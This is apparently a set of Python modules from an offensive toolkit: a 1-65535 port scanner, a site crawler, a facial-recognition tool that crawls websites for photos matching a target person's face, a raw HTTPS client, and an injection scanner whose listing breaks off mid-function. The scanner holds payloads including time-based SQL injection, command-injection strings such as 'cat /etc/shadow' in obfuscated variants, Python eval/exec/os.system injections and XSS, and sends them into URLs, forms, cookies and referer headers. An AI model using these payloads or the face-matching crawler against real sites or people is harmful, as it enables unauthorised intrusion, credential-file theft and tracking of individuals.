import asyncio

async def bottlenose(host, port):
    try:
        reader, writer = await asyncio.wait_for(asyncio.open_connection(host, port), 15)
        writer.close()
        return port

    except:
        pass

async def pink_dolphin(host):
    tasks = []
    for port in range(1,65535):
        tasks.append(bottlenose(host, port))

    hits = await asyncio.gather(*tasks)
    results = []
    for hit in hits:
        if hit != None:
            results.append(hit)

    return results

def dolphin(host):
    ports = asyncio.run(pink_dolphin(host))
    ports = list(dict.fromkeys(ports[:]))
    return ports



import re
import time
import urllib.parse
from TheSilent.clear import clear
from TheSilent.puppy_requests import text, url

CYAN = "\033[1;36m"

def kitten_crawler(host,delay=0,crawl=1):
    clear()
    host = host.rstrip("/")
    hits = [host]
    total = []
    depth = -1
    for depth in range(crawl):
        hits = list(dict.fromkeys(hits[:]))
        try:
            if urllib.parse.urlparse(host).netloc in urllib.parse.urlparse(hits[depth]).netloc or ".js" in hits[depth] or ".gif" in hits[depth] or ".jpeg" in hits[depth] or ".jpg" in hits[depth] or ".png" in hits[depth] or ".webp" in hits[depth]:
                valid = bytes(hits[depth],"ascii")
                time.sleep(delay)
                print(CYAN + hits[depth])
                data = text(hits[depth])
                total.append(hits[depth])

        except IndexError:
            break

        except:
            continue

        try:
            links = re.findall("content\s*=\s*[\"\'](\S+)(?=[\"\'])|href\s*=\s*[\"\'](\S+)(?=[\"\'])|src\s*=\s*[\"\'](\S+)(?=[\"\'])",data.lower())
            for link in links:
                for _ in link:
                    _ = re.split("[\"\'\<\>\;\{\}\,\(\)]",_)[0]
                    if _.startswith("/") and not _.startswith("//"):
                        hits.append(f"{host}{_}")

                    elif not _.startswith("/") and not _.startswith("http://") and not _.startswith("https://"):
                        hits.append(f"{host}/{_}")

                    elif _.startswith("http://") or _.startswith("https://"):
                        hits.append(_)

        except:
            pass

    hits = list(dict.fromkeys(hits[:]))
    hits.sort()
    results = []
    for hit in total:
        try:
            if urllib.parse.urlparse(host).netloc in hit or ".gif" in hit or ".jpeg" in hit or ".jpg" in hit or ".png" in hit or ".webp" in hit:
                valid = bytes(hit,"ascii")
                results.append(hit)

        except UnicodeDecodeError:
            pass

    clear()
    return results



import io
import numpy as np
import random
import sys
import time
from deepface import DeepFace
from PIL import Image
from TheSilent.clear import clear
from TheSilent.kitten_crawler import kitten_crawler
from TheSilent.puppy_requests import text

CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[1;31m"

def owl(image,delay=0,crawl=1000,sites=[]):
    clear()

    try:
        DeepFace.verify(image, image)

    except ValueError:
        print(RED + "we either couldn't identify a face or the target image file doesn't exist")
        sys.exit()
    
    hits = []

    if sites != None:
        try:
            DeepFace.verify(image, image)

        except:
            print(RED + "either target image doesn't exist or we can't identify any faces")
            sys.exit()

        for site in sites:
            print(CYAN + f"crawling: {site}")
            hosts = kitten_crawler(site,delay,crawl)
            for host in hosts:
                if ".gif" in host or ".jpeg" in host or ".jpg" in host or ".png" in host or ".webp" in host:
                    print(CYAN + f"checking {host}")
                    time.sleep(delay)
                    try:
                        if DeepFace.verify(image, np.array(Image.open(io.BytesIO(text(host,raw=True)))))["verified"]:
                            hits.append(host)
                    
                    except:
                        pass

    hits = list(set(hits[:]))
    hits.sort()

    clear()
    if len(hits) > 0:
        for hit in hits:
            print(RED + f"found: {hit}")

    else:
        print(GREEN + f"we didn't find anything interesting")



import re
import ssl
import socket
import urllib.parse

def https(host,port=443,timeout=10,mode="text"):
    if not host.endswith("/"):
        host += "/"
    history = [host]
    context = ssl.create_default_context()
    context.check_hostname = False
    with socket.create_connection((urllib.parse.urlparse(host).netloc.split(":")[0].split("/")[0], int(port))) as sock:
        with context.wrap_socket(sock, server_hostname=urllib.parse.urlparse(host).netloc.split(":")[0].split("/")[0]) as ssock:
                ssock.settimeout(timeout)
                ssock.send(b"GET " + urllib.parse.urlparse(host).path.encode()  + b" HTTP/1.1\r\nHost: " + urllib.parse.urlparse(host).netloc.split(":")[0].split("/")[0].encode() + b"\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: identity\r\nDNT: 1\r\nSec-GPC: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n")
                data = ssock.recv(4096)
                print(data.decode())
                if data.lower().startswith(b"http/1.1 30") and mode != "status":
                    for i in range(1000):
                        if data.lower().startswith(b"http/1.1 30"):
                            location = re.findall("location\s*:\s*(https://\S+)", data.decode().lower())[0]
                            history.append(location)
                            ssock.send(b"GET " + urllib.parse.urlparse(location).path.encode()  + b" HTTP/1.1\r\nHost: " + urllib.parse.urlparse(location).netloc.split(":")[0].split("/")[0].encode() + b"\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: identity\r\nDNT: 1\r\nSec-GPC: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n")
                            data = ssock.recv(4096)
                            
                        elif data.lower().startswith(b"http/1.1 200"):
                            ssock.send(b"GET " + urllib.parse.urlparse(location).path.encode()  + b" HTTP/1.1\r\nHost: " + urllib.parse.urlparse(location).netloc.split(":")[0].split("/")[0].encode() + b"\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: identity\r\nDNT: 1\r\nSec-GPC: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n")
                            while True:
                                data += ssock.recv(4096)
                                if data.count(b"HTTP/1.1") > 1:
                                    break
                            result = b"HTTP/1.1" + data.split(b"HTTP/1.1")[0] + data.split(b"HTTP/1.1")[1]
                            result = re.sub(b"\r\n[0-9][0-9a-f]+",b"",result)
                            result = re.sub(b"\r\n[0]",b"",result)
                            if mode == "header":
                                if b"\r\n\r\n" in result:
                                    result = result.split(b"\r\n\r\n")[0]
                                elif b"\n\n" in result:
                                    result = result.split(b"\n\n")[0]
                                return result.decode(errors="ignore")
                            elif mode == "raw":
                                if b"\r\n\r\n" in result:
                                    result = result.split(b"\r\n\r\n")[1]
                                elif b"\n\n" in result:
                                    result = result.split(b"\n\n")[1]
                                return result
                            elif mode == "text":
                                if b"\r\n\r\n" in result:
                                    result = result.split(b"\r\n\r\n")[1]
                                elif b"\n\n" in result:
                                    result = result.split(b"\n\n")[1]
                                return result.decode(errors="ignore")
                            elif mode == "history":
                                return history
                            

                        elif not data.lower().startswith(b"http/1.1"):
                            ssock.send(b"GET " + urllib.parse.urlparse(location).path.encode()  + b" HTTP/1.1\r\nHost: " + urllib.parse.urlparse(location).netloc.split(":")[0].split("/")[0].encode() + b"\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: identity\r\nDNT: 1\r\nSec-GPC: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n")
                            data = ssock.recv(4096)

                        else:
                            return int(re.findall("http/1.1\s*(\d+)?", data.decode().lower())[0])

                elif data.lower().startswith(b"http/1.1 200") and mode != "status":
                    ssock.send(b"GET " + urllib.parse.urlparse(host).path.encode()  + b" HTTP/1.1\r\nHost: " + urllib.parse.urlparse(host).netloc.split(":")[0].split("/")[0].encode() + b"\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: identity\r\nDNT: 1\r\nSec-GPC: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: none\r\nSec-Fetch-User: ?1\r\n\r\n")
                    while True:
                        data += ssock.recv(4096)
                        if data.count(b"HTTP/1.1") > 1:
                            break

                    result = b"HTTP/1.1" + data.split(b"HTTP/1.1")[0] + data.split(b"HTTP/1.1")[1]
                    result = re.sub(b"\r\n[0-9][0-9a-f]+",b"",result)
                    result = re.sub(b"\r\n[0]",b"",result)
                    if mode == "header":
                        if b"\r\n\r\n" in result:
                            result = result.split(b"\r\n\r\n")[0]
                        elif b"\n\n" in result:
                            result = result.split(b"\n\n")[0]
                        return result.decode(errors="ignore")
                    elif mode == "raw":
                        if b"\r\n\r\n" in result:
                            result = result.split(b"\r\n\r\n")[1]
                        elif b"\n\n" in result:
                            result = result.split(b"\n\n")[1]
                        return result
                    elif mode == "text":
                        if b"\r\n\r\n" in result:
                            result = result.split(b"\r\n\r\n")[1]
                        elif b"\n\n" in result:
                            result = result.split(b"\n\n")[1]
                        return result.decode(errors="ignore")

                    elif mode == "history":
                        return history

                    return int(re.findall("http/1.1\s*(\d+)?", data.decode().lower())[0])

                elif mode == "status":
                    return int(re.findall("http/1.1\s*(\d+)?", data.decode().lower())[0])
                    

print(https("https://www.tiktok.com/explore",mode="header"))



import re
import time
import urllib.parse
from TheSilent.clear import clear
from TheSilent.kitten_crawler import kitten_crawler
from TheSilent.puppy_requests import text

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

def cobra(host,delay=0,crawl=1):
    hits = []

    mal_adobe_groovy = [r"sleep(60)"]

    mal_apple_script = [r"delay 60"]

    mal_command = [r"sleep 60",
                   r"sleep \6\0"]

    mal_command_enumerate = [r"cat /etc/shadow",
                             r"cat \/\e\t\c/\s\h\ad\o\w",
                             r"ls -l -a",
                             r"\l\s",
                             r"pwd",
                             r"\p\w\d",
                             r"whoami",
                             r"\w\h\o\a\m\i"]
    
    mal_go_lang = [r'package main;import "time";func main(){time.Sleep(60*time.Second)}']
    
    mal_ms_sql = [r'WAITFOR DELAY "00:01"']

    mal_my_sql = [r"SELECT SLEEP(60);"]

    mal_oracle_sql = [r"DBMS_LOCK.sleep(60);",
                  r"DBMS_SESSION.sleep(60);"]
    
    mal_perl = [r"sleep(60);"]

    mal_php = [r"sleep(60);"]

    mal_postgresql = [r"pg_sleep(60);",
                      r"PERFORM pg_sleep(60);",
                      r"SELECT pg_sleep(60);"]
    
    mal_powershell = [r"start-sleep -seconds 60"]

    mal_python = [r"time.sleep(60)",
                  r"eval(compile('import time\ntime.sleep(60)','cobra','exec'))",
                  r"eval(compile('import os\nos.system('sleep 60')','cobra','exec'))",
                  r"__import__('time').sleep(60)",
                  r"__import__('os').system('sleep 60')",
                  r'eval("__import__(\'time\').sleep(60)")',
                  r'eval("__import__(\'os\').system(\'sleep 60\')")',
                  r'exec("__import__(\'time\').sleep(60)")',
                  r'exec("__import__(\'os\').system(\'sleep 60\')")',
                  r'exec("import time\ntime.sleep(60)")',
                  r'exec("import os\nos.system(\'sleep 60\')")']

    mal_python_enumerate = [r"eval(compile('import os\nos.system('cat /etc/shadow')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('cat \/\e\t\c/\s\h\ad\o\w')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('ls -l -a')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\l\s')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('pwd')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\p\w\d')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('whoami')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\w\h\o\a\m\i')','cobra','exec'))",
                            r"__import__('os').system('cat /etc/shadow')",
                            r"__import__('os').system('cat \/\e\t\c/\s\h\ad\o\w')",
                            r"__import__('os').system('ls -l -a')",
                            r"__import__('os').system('\l\s')",
                            r"__import__('os').system('pwd')",
                            r"__import__('os').system('\p\w\d')",
                            r"__import__('os').system('whoami')",
                            r"__import__('os').system('\w\h\o\a\m\i')",
                            r'eval("__import__(\'os\').system(\'cat /etc/shadow\')")',
                            r'eval("__import__(\'os\').system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'eval("__import__(\'os\').system(\'ls -l -a\')")',
                            r'eval("__import__(\'os\').system(\'\l\s\')")',
                            r'eval("__import__(\'os\').system(\'pwd\')")',
                            r'eval("__import__(\'os\').system(\'\p\w\d\')")',
                            r'eval("__import__(\'os\').system(\'whoami\')")',
                            r'eval("__import__(\'os\').system(\'\w\h\o\a\m\i\')")',
                            r'exec("__import__(\'os\').system(\'cat /etc/shadow\')")',
                            r'exec("__import__(\'os\').system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'exec("__import__(\'os\').system(\'ls -l -a\')")',
                            r'exec("__import__(\'os\').system(\'\l\s\')")',
                            r'exec("__import__(\'os\').system(\'pwd\')")',
                            r'exec("__import__(\'os\').system(\'\p\w\d\')")',
                            r'exec("__import__(\'os\').system(\'whoami\')")',
                            r'exec("__import__(\'os\').system(\'\w\h\o\a\m\i\')")',
                            r'exec("import os\nos.system(\'cat /etc/shadow\')")',
                            r'exec("import os\nos.system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'exec("import os\nos.system(\'ls -l -a\')")',
                            r'exec("import os\nos.system(\'\l\s\')")',
                            r'exec("import os\nos.system(\'pwd\')")',
                            r'exec("import os\nos.system(\'\p\w\d\')")',
                            r'exec("import os\nos.system(\'whoami\')")',
                            r'exec("import os\nos.system(\'\w\h\o\a\m\i\')")']
    
    mal_ruby = [r"sleep(1.minutes)"]
    
    mal_xss = [r"<iframe>Cobra</iframe>",
               r"<p>cobra</p>",
               r"<script>alert('Cobra')</script>",
               r"<script>await sleep(60);</script>",
               r"<script>prompt('Cobra')</script>",
               r"<strong>cobra</strong>",
               r"<style>body{background-color:red;}</style>",
               r"<title>cobra</title>"]
    
    hosts = kitten_crawler(host,delay,crawl)

    for _ in hosts:
        print(CYAN + f"checking: {_}")

        try:
            forms = re.findall("<form.+form>",text(_).replace("\n",""))

        except:
            forms = []

        # check for adobe groovy injection
        for mal in mal_adobe_groovy:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"adobe groovy injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"adobe groovy injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"adobe groovy injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"adobe groovy injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"adobe groovy injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"adobe groovy injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for apple script injection
        for mal in mal_apple_script:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"apple script injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"apple script injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"apple script injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"apple script injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"apple script injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"apple script injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for command injection
        for mal in mal_command:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"command injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"command injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"command injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"command injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"command injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"command injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for go lang injection
        for mal in mal_go_lang:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"go lang injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"go lang injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"go lang injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"go lang injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"go lang injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"go lang injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for ms sql injection
        for mal in mal_ms_sql:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ms sql injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ms sql injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ms sql injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"ms sql injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"ms sql injection in forms: {action} | {field_dict}")

                            else:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
                                if end - start >= 45:
                                    hits.append(f"ms sql injection in forms: {_} | {field_dict}")

                except:
                    pass

        # check for my sql injection
        for mal in mal_my_sql:
            try:
                time.sleep(delay)
                start = time.time()
                data = text(_ + "/" + mal, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"my sql injection in url: {_}/{mal}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, data = mal.encode(), timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"my sql injection in data ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Cookie",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"my sql injection in cookie ({mal}): {_}")

            except:
                pass

            try:
                time.sleep(delay)
                start = time.time()
                data = text(_, headers = {"Referer",mal}, timeout = 120)
                end = time.time()
                if end - start >= 45:
                    hits.append(f"my sql injection in referer ({mal}): {_}")

            except:
                pass
            
            for form in forms:
                field_list = []
                input_field = re.findall("<input.+?>",form)
                try:
                    action_field = re.findall("action\s*=\s*[\"\'](\S+)[\"\']",form)[0]
                    if action_field.startswith("/"):
                        action = host + action_field

                    elif not action_field.startswith("/") and not action_field.startswith("http://") and not action_field.startswith("https://"):
                        action = host + "/" + action_field

                    else:
                        action = action_field
                        
                except IndexError:
                    pass

                try:
                    method_field = re.findall("method\s*=\s*[\"\'](\S+)[\"\']",form)[0].upper()
                    for in_field in input_field:
                        if re.search("name\s*=\s*[\"\'](\S+)[\"\']",in_field) and re.search("type\s*=\s*[\"\'](\S+)[\"\']",in_field):
                            name_field = re.findall("name\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            type_field = re.findall("type\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            try:
                                value_field = re.findall("value\s*=\s*[\"\'](\S+)[\"\']",in_field)[0]
                            
                            except IndexError:
                                value_field = ""
                            
                            if type_field == "submit" or type_field == "hidden":
                                field_list.append({name_field:value_field})


                            if type_field != "submit" and type_field != "hidden":
                                field_list.append({name_field:mal})

                            field_dict = field_list[0]
                            for init_field_dict in field_list[1:]:
                                field_dict.update(init_field_dict)

                            time.sleep(delay)

                            if action:
                                start = time.time()
                                data = text(action,method=method_field,data=field_dict,timeout=120)
                                end = time.time()
